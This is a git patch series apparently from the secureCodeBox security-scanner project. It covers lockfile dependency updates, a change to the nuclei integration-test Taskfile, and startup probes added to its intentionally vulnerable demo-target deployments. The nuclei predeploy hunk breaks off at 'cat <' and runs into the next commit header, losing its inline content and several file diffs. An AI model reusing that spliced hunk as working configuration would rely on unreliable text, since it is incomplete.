"sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==" + "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", + "dev": true }, "source-map-support": { "version": "0.5.13", "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", + "dev": true, "requires": { "buffer-from": "^1.0.0", "source-map": "^0.6.0" @@ -6741,29 +7092,14 @@ "sprintf-js": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==" - }, - "sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "dev": true, - "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - } + "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", + "dev": true }, "stack-utils": { "version": "2.0.6", "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", + "dev": true, "requires": { "escape-string-regexp": "^2.0.0" } @@ -6774,10 +7110,22 @@ "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", "dev": true }, + "streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", + "dev": true, + "requires": { + "bare-events": "^2.2.0", + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" + } + }, "string-length": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", + "dev": true, "requires": { "char-regex": "^1.0.2", "strip-ansi": "^6.0.0" @@ -6787,6 +7135,7 @@ "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "dev": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", @@ -6797,6 +7146,7 @@ "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "dev": true, "requires": { "ansi-regex": "^5.0.1" } @@ -6804,22 +7154,26 @@ "strip-bom": { "version": "4.0.0", "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==" + "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", + "dev": true }, "strip-final-newline": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==" + "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", + "dev": true }, "strip-json-comments": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==" + "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", + "dev": true }, "supports-color": { "version": "7.2.0", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, "requires": { "has-flag": "^4.0.0" } @@ -6827,67 +7181,78 @@ "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" + "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", + "dev": true }, - "tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", + "tar-fs": { + "version": "3.0.10", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.0.10.tgz", + "integrity": "sha512-C1SwlQGNLe/jPNqapK8epDsXME7CAJR5RL3GcE6KWx1d9OUByzoHVcbu1VPI8tevg9H8Alae0AApHHFGzrD5zA==", "dev": true, "requires": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" - }, - "dependencies": { - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0", + "pump": "^3.0.0", + "tar-stream": "^3.1.5" + } + }, + "tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", + "dev": true, + "requires": { + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, "test-exclude": { "version": "6.0.0", "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", + "dev": true, "requires": { "@istanbuljs/schema": "^0.1.2", "glob": "^7.1.4", "minimatch": "^3.0.4" } }, + "text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "dev": true, + "requires": { + "b4a": "^1.6.4" + } + }, "tmpl": { "version": "1.0.5", "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==" + "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", + "dev": true }, "to-regex-range": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", + "dev": true, "requires": { "is-number": "^7.0.0" } }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dev": true, - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - } + "tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", + "dev": true }, "ts-jest": { "version": "29.2.5", "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", + "dev": true, "requires": { "bs-logger": "^0.2.6", "ejs": "^3.1.10", @@ -6903,109 +7268,87 @@ "semver": { "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==" + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true } } }, - "tslib": { - "version": "2.6.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.0.tgz", - "integrity": "sha512-7At1WUettjcSRHXCyYtTselblcHl9PJFFVKiCAy/bY97+BPZXSQ2wbq0P9s8tK2G7dFQfNnlJnPAiArVBVBsfA==", - "dev": true - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "dev": true, - "requires": { - "safe-buffer": "^5.0.1" - } - }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==", - "dev": true - }, "type-detect": { "version": "4.0.8", "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==" + "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", + "dev": true }, "type-fest": { "version": "0.21.3", "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==" + "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", + "dev": true }, "typescript": { "version": "5.7.2", "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", + "dev": true, "peer": true }, "undici-types": { - "version": "6.19.8", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", - "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==" + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", + "dev": true }, "update-browserslist-db": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", + "dev": true, "requires": { "escalade": "^3.2.0", "picocolors": "^1.1.0" } }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dev": true, - "requires": { - "punycode": "^2.1.0" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "dev": true - }, "v8-to-istanbul": { "version": "9.3.0", "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", + "dev": true, "requires": { "@jridgewell/trace-mapping": "^0.3.12", "@types/istanbul-lib-coverage": "^2.0.1", "convert-source-map": "^2.0.0" } }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "dev": true, - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, "walker": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", + "dev": true, "requires": { "makeerror": "1.0.12" } }, + "webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", + "dev": true + }, + "whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "dev": true, + "requires": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + }, "which": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "dev": true, "requires": { "isexe": "^2.0.0" } @@ -7014,6 +7357,7 @@ "version": "7.0.0", "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "dev": true, "requires": { "ansi-styles": "^4.0.0", "string-width": "^4.1.0", @@ -7023,38 +7367,43 @@ "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", + "dev": true }, "write-file-atomic": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", + "dev": true, "requires": { "imurmurhash": "^0.1.4", "signal-exit": "^3.0.7" } }, "ws": { - "version": "8.13.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.13.0.tgz", - "integrity": "sha512-x9vcZYTrFPC7aSIbj7sRCYo7L/Xb8Iy+pW0ng0wt2vCJv7M9HOMy0UoN3rr+IFC7hb7vXoqS+P9ktyLLLhO+LA==", + "version": "8.18.2", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.2.tgz", + "integrity": "sha512-DMricUmwGZUVr++AEAe2uiVM7UoO9MAVZMDu05UQOaUII0lp+zOzLLU4Xqh/JvTqklB1T4uELaaPBKyjE1r4fQ==", "dev": true, "requires": {} }, "y18n": { "version": "5.0.8", "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==" + "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", + "dev": true }, "yallist": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==" + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", + "dev": true }, "yargs": { "version": "17.7.2", "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", + "dev": true, "requires": { "cliui": "^8.0.1", "escalade": "^3.1.1", @@ -7068,12 +7417,14 @@ "yargs-parser": { "version": "21.1.1", "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==" + "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", + "dev": true }, "yocto-queue": { "version": "0.1.0", "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==" + "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", + "dev": true } } } diff --git a/tests/integration/package.json b/tests/integration/package.json index 80f4d5186b..0236cfd709 100644 --- a/tests/integration/package.json +++ b/tests/integration/package.json @@ -7,20 +7,17 @@ "test:unit": "jest --verbose --testPathIgnorePatterns /integration-tests/ --ci --colors --coverage --passWithNoTests", "test:integration": "jest --verbose --ci --colors --coverage --passWithNoTests", "test:helpers": "jest helpers.test.js --verbose --ci --colors --coverage --passWithNoTests" - }, "keywords": [], "author": "iteratec GmbH", "license": "Apache-2.0", "devDependencies": { "jest": "^29.7.0", - "prettier": "^3.4.2", - "@kubernetes/client-node": "^0.19.0", - "@securecodebox/parser-sdk-nodejs": "file:../../parser-sdk/nodejs" - }, - "dependencies": { - "@kubernetes/client-node": "^0.19.0", + "prettier": "^3.6.0", + "@kubernetes/client-node": "^1.3.0", + "@securecodebox/parser-sdk-nodejs": "file:../../parser-sdk/nodejs", "@types/jest": "^29.5.14", "ts-jest": "^29.2.5" - } -} + }, + "dependencies": {} +} \ No newline at end of file From 25ef52834da480ac2c703ef7029c0bc9e3f7ae47 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Sun, 29 Jun 2025 21:18:06 +0200 Subject: [PATCH 036/137] Optimize nuclei integration test to not load tempaltes dynamically from the internet (which is flaky and slow) Signed-off-by: Jannik Hollenbach --- scanners/Taskfile.yaml | 17 +++-- scanners/nuclei/Taskfile.yaml | 74 ++++++++++++++++++- .../nuclei/integration-tests/nuclei.test.js | 22 ++++-- tests/integration/helpers.ts | 17 +++-- 4 files changed, 110 insertions(+), 20 deletions(-) diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml index b755a6c63f..c56b12cb80 100644 --- a/scanners/Taskfile.yaml +++ b/scanners/Taskfile.yaml @@ -6,9 +6,13 @@ includes: internal: true vars: + # demo apps required for integration tests, e.g. "bodgeit juice-shop", etc. reference the demo apps in the demo-targets/Taskfile.yaml demoAppsRequiredForIntegrationTests: '{{ .demoAppsRequiredForIntegrationTests | default "" }}' + # if the scanner uses a custom scanner container image which needs to be built. Usually false as we prefer to reference the official scanner container images hasCustomScanner: sh: 'if [ -d "{{ .ROOT_DIR }}/scanner/" ]; then echo "true"; else echo "false"; fi' + # addtional cli args to pass to the helm install command which installs the scanner into the testing environment + additionalHelmInstallArgsForScanner: '{{ .additionalHelmInstallArgsForScanner | default "" }}' env: IMG_TAG: sh: 'echo "sha-$(git rev-parse --short HEAD)"' @@ -35,23 +39,26 @@ tasks: --build-arg=baseImageTag=${IMG_TAG} \ {{ .ROOT_DIR }}/parser/ kind load docker-image --name testing-env docker.io/securecodebox/parser-{{ .scannerName }}:${IMG_TAG} + predeploy: + desc: Can be overwritten by the scanner to perform any pre-deployment steps + cmds: [] + silent: true deploy: desc: Deploy the {{ .scannerName }} scanner to the testing environment cmds: - 'echo "Deploying {{ .scannerName }} to the testing environment"' + - task: predeploy - | helm upgrade --install {{ .scannerName }} {{ .ROOT_DIR }} --namespace integration-tests \ {{ if eq "true" .hasCustomScanner -}} --set="scanner.image.tag=${IMG_TAG}" \ --set="scanner.image.pullPolicy=Never" \ - {{ else -}} - --set="scanner.image.repository=securecodebox/scanner-nuclei-precooked" \ - --set="scanner.image.tag=v3.4.2-2025-06-02" \ - --set="scanner.image.pullPolicy=IfNotPresent" \ + {{ end -}} + {{ if ne "" .additionalHelmInstallArgsForScanner -}} + {{ .additionalHelmInstallArgsForScanner -}} {{ end -}} --set="parser.image.tag=${IMG_TAG}" \ --set="parser.image.pullPolicy=Never" \ - --set="nucleiTemplateCache.enabled=false" \ --wait test:setup: desc: Installs all the various dependencies needed to run the tests for the {{ .scannerName }} scanner diff --git a/scanners/nuclei/Taskfile.yaml b/scanners/nuclei/Taskfile.yaml index 9c0e9b1a87..f07aa22069 100644 --- a/scanners/nuclei/Taskfile.yaml +++ b/scanners/nuclei/Taskfile.yaml @@ -4,8 +4,80 @@ includes: scanner: taskfile: ../Taskfile.yaml flatten: true + excludes: + - predeploy vars: scannerName: nuclei demoAppsRequiredForIntegrationTests: "bodgeit" + additionalHelmInstallArgsForScanner: | + --set="scanner.image.pullPolicy=IfNotPresent" \ + --set="nucleiTemplateCache.enabled=false" \ -tasks: {} +tasks: + predeploy: + desc: This is a dummy task to ensure the scanner Taskfile is included correctly + cmds: + - | + # create a nuclei template configmap from inline definition + cat < Date: Tue, 1 Jul 2025 22:19:16 +0200 Subject: [PATCH 037/137] Add startup probes so that the demo apps are faster recognised as ready by kubernetes --- demo-targets/bodgeit/templates/deployment.yaml | 8 ++++++++ demo-targets/dummy-ssh/templates/deployment.yaml | 6 ++++++ demo-targets/http-webhook/templates/deployment.yaml | 7 +++++++ demo-targets/juice-shop/templates/deployment.yaml | 7 +++++++ demo-targets/old-joomla/templates/deployment.yaml | 7 +++++++ demo-targets/old-typo3/templates/deployment.yaml | 7 +++++++ demo-targets/old-wordpress/templates/deployment.yaml | 7 +++++++ demo-targets/swagger-petstore/templates/deployment.yaml | 7 +++++++ demo-targets/unsafe-https/templates/deployment.yaml | 6 ++++++ demo-targets/vulnerable-log4j/templates/deployment.yaml | 7 +++++++ 10 files changed, 69 insertions(+) diff --git a/demo-targets/bodgeit/templates/deployment.yaml b/demo-targets/bodgeit/templates/deployment.yaml index 22910b9e90..18397ff018 100644 --- a/demo-targets/bodgeit/templates/deployment.yaml +++ b/demo-targets/bodgeit/templates/deployment.yaml @@ -38,6 +38,14 @@ spec: - name: http containerPort: 8080 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 + timeoutSeconds: 5 livenessProbe: httpGet: path: / diff --git a/demo-targets/dummy-ssh/templates/deployment.yaml b/demo-targets/dummy-ssh/templates/deployment.yaml index bd8ffaff82..e058d51233 100644 --- a/demo-targets/dummy-ssh/templates/deployment.yaml +++ b/demo-targets/dummy-ssh/templates/deployment.yaml @@ -38,6 +38,12 @@ spec: - name: ssh containerPort: 22 protocol: TCP + startupProbe: + tcpSocket: + port: 22 + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 livenessProbe: tcpSocket: port: 22 diff --git a/demo-targets/http-webhook/templates/deployment.yaml b/demo-targets/http-webhook/templates/deployment.yaml index 120af929fe..19b09d3075 100644 --- a/demo-targets/http-webhook/templates/deployment.yaml +++ b/demo-targets/http-webhook/templates/deployment.yaml @@ -49,6 +49,13 @@ spec: - name: http containerPort: 8080 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 resources: {{- toYaml .Values.resources | nindent 12 }} {{- with .Values.nodeSelector }} diff --git a/demo-targets/juice-shop/templates/deployment.yaml b/demo-targets/juice-shop/templates/deployment.yaml index dd5a84643b..79f603d3b5 100644 --- a/demo-targets/juice-shop/templates/deployment.yaml +++ b/demo-targets/juice-shop/templates/deployment.yaml @@ -51,6 +51,13 @@ spec: - name: http containerPort: 3000 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 livenessProbe: httpGet: path: / diff --git 